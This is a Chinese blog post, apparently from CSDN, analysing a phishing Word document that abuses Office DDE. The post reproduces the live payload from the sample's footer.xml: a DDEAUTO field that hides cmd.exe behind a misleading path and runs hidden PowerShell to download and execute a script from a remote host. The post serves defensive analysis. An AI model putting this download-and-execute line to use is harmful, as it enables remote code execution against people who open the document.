使用Office进行DDE攻击

最新推荐文章于 2024-09-02 09:48:07 发布
原创 最新推荐文章于 2024-09-02 09:48:07 发布 · 2.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#DDE攻击

本文揭示了通过伪装成正常Word文档的恶意Docx文件进行的攻击手法。攻击者利用DDE自动执行特性,将恶意代码藏匿于文档的footer.xml文件中,一旦文档被打开,便会触发执行,下载并运行远程恶意脚本。此过程甚至绕过了普通用户的警惕,因为看似正常的Word程序启动行为,实则暗藏杀机。

当你打开恶意docx文件时,会有提示信息,不过通过解析路径的手段,把可疑部分隐藏了。

这个提示信息,看起来是启动我Word安装目录下的一个程序,普通人觉得,Word启动它自己目录下的程序,应该很正常呀!于是就点了

在这里插入图片描述
此时用procexp查看进程列表,恶意的代码已经执行了~

在这里插入图片描述

如果用7z来打开这个docx文件,可以看到里面的footer.xml文件中包含的恶意部分

在这里插入图片描述

DDEAUTO  "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c 
pOWeRShELl.exe  -NoP -W Hidden IEX(nEw-oBjECt sYstEM.nEt.wEBcLIeNt).dOWnLoADsTRiNg('http://stinky.esy.es/ip.php'); 
#"  "Financial Security Institue RFRE System"

powershell.exe会从'http://stinky.esy.es/ip.php下载新的ps代码执行

在这里插入图片描述

代码还原后

在这里插入图片描述

Office DDE漏洞临时解决方案
Tide的小家
12-18 918
紧急修复方案
谨防钓鱼——OFFICE DDE复现
tempulcc的博客
09-08 697
OFFICE DDE,这是微软的 OFFICE中的一个功能,能过够执行公式,插入远程图片,也可以用来执行恶意代码,即有了OFFICE DDE漏洞,cve编号:CVE-2017-11882,刚开始漏洞被发现的时候,微软并没有认为是漏洞,认为这是OFFICE软件的正常功能。 正好今天学习metasploit,拿这个漏洞练练手 msfconsole search office-dde use exploit/windows/fileformat/office_dde_delivery set payload
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
weixin_45575473的博客
04-20 772
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击 DDE DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。 通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。 在MSWord和MSExcel里,我们可以使用DDE来执行命令。 DDE
探索Office的隐秘角落:Office-DDE-Payloads深度剖析与应用
gitblog_00062的博客
06-04 340
探索Office的隐秘角落:Office-DDE-Payloads深度剖析与应用 Office-DDE-PayloadsCollection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique.项目地址:https:/...
Office-DDE-Payloads 使用指南
最新发布
gitblog_00369的博客
09-02 399
Office-DDE-Payloads 使用指南 项目概述 Office-DDE-Payloads 是一个位于 GitHub 的开源项目,专注于提供有关Microsoft Office文档中动态数据交换(DDE)利用的相关payloads。此项目对于安全研究人员、渗透测试者尤为重要,旨在帮助理解并实施基于DDE攻击的技术,同时也可用于教育目的,提高对这类安全威胁的认识。 项目目录结构及介绍 Off...
ms office DDE攻击与防御
09-17
### ms office DDE攻击与防御 #### 一、DDE技术概述 动态数据交换(Dynamic Data Exchange, DDE)是一种由Microsoft开发的技术,用于不同应用程序之间的数据交换与通信。这项技术自1987年的Windows 2.0起便被引入...
DDE-MS_WORD-Exploit_Detector:Microsoft Office Word文件(doc,docx)通过AX302进行DDE攻击检查
05-10
DDE RCE(CVE-2017-11826)检测器: Microsoft Office Word文件(doc,docx)通过AX302进行DDE攻击检查 您将可以检查某些Word文档是否被感染! 然后解压缩xml文件以读取有效负载,而没有风险:p!
MS Office DDE攻击详解与防御策略
对于Outlook而言,由于它使用Word作为邮件的默认解析器,DDE攻击也可以通过RTF格式的邮件进行。攻击者可以创建一个包含DDE命令的Word文档,然后将其复制到Outlook的新邮件正文中。当目标用户打开邮件时,DDE命令可能...
DeeDee: 利用Python自动化DDE攻击与MS Office文档注入
2. DDE攻击原理:DDE攻击指的是利用MS Office应用程序之间的动态数据交换(Dynamic Data Exchange)功能进行安全攻击攻击者通过在文档中嵌入特定的代码,当用户打开文档时,触发DDE请求,执行攻击者指定的恶意命令...
检测Microsoft Word文档中的DDE攻击DDE-MS_WORD-Exploit_Detector工具
DDE-MS_WORD-Exploit_Detector的标签包括msoffice、cve-2017-11826、dde-rce和dde-attack-checker,表明了这个工具与Microsoft Office、特定的漏洞编号、远程代码执行漏洞以及DDE攻击检测相关联。了解这些标签背后的...
Office DDE 攻击
10-24 286
Authors: Etienne Stalmans, Saif El-Sherei What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods ...
word中的dde
weixin_33816300的博客
04-20 640
word使用快捷键ctrl+f9 打开后有个大括号,在里边输入系统命令可以执行。配合powershell可以做很多事。 现象(一) 现象(二) 执行成功 解决方案(1): 在word选项中,勾选显示域代码而非域值。这样在打开的文档中可以直接看到域代码。 解决方案(2):关闭自动更新链接 解决方案(3):注册表彻底禁用 来自:https://gist.github.com/wdorman...
使用DDE来操作Word
ljmwork的专栏
07-03 3032
使用DDE来操作Word Windows支持三种基本的IPC(进程间通信)机制:动态链接库(DLL)中的共享数据段、Windows剪贴版(Clipboard)和动态数据交换DDE(Dynamic         Data Exchange)。许多著名的Windows应用程序如Microsoft         Word等都宣布支持DDE技术,并在程序中嵌入了D
Office DDE漏洞学习笔记
weixin_30315435的博客
03-11 455
1、前言 2017年下半年爆发出来的Office漏洞,一直没有空做笔记记录。在病毒分析中也看到有利用这个漏洞的样本,针对Office系列软件发起的钓鱼攻击和APT攻击一直是安全攻防的热点。 2、office DDE Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。 这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容...
java程序拦截dde漏洞问题_勒索病毒又更新 Office DDE漏洞被利用
weixin_33186395的博客
03-01 463
勒索软件已见怪不怪了,下半年每天都有新的勒索软件出现,中毒电脑文件被高强度加密,能恢复的极为罕见,受害用户损失惨重。勒索病毒的攻击手法也无所不用其极,本周末,金山毒霸安全实验室再次截获最新的勒索软件,该病毒利用Office DDE漏洞(Microsoft动态数据交换),极具伪装性、欺骗性,用户点错对话框会立刻导致电脑文件被加密。病毒最初来源于不法分子精心伪造的电子邮件,如果收件人粗心大意,下载点击...
java程序拦截dde漏洞问题_HackerNews
weixin_29289821的博客
03-01 372
近日,Mimecast 威胁中心的安全研究人员,发现了微软 Excel 电子表格应用程序的一个新漏洞,获致 1.2 亿用户易受网络攻击。其指出,该安全漏洞意味着攻击者可以利用 Excel 的 Power Query 查询工具,在电子表格上启用远程动态数据交换(DDE),并控制有效负载。此外,Power Query 还能够用于将恶意代码嵌入数据源并进行传播。(图自:Mimecast,viaBeta...
关于word中的DDE如何查看
qq_45844442的博客
10-11 562
word当中可以内置一些代码,而这些代码有个专业名词叫做域代码,一般情况下这个代码是被隐藏了,需要在。其中里面有会置入大量数字,其实都是ASCII码,如图所示。勾选上即可看见(我使用的是WPS)
DDE攻击利用介绍
Fly_鹏程万里
02-20 588
2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估。
利用PowerShell Empire实现Word文档DDE攻击控制(简单没啥用)
墨痕诉清风的博客
04-09 625
近期,有安全人员发现了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExcel漏洞,就能实现在Office文档中执行恶意命令目的。在这篇文章中,我将展示如何利用基于Empire的PowerShell来对Word文档进行“伪装”攻击,可能还有其它实现方法,我仅作个抛砖引玉。 创建Empire Listener 创建一个Empire Listener监听线程,可点此查看Empire的使用说明。 当监听线程启动运行之后,运行
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值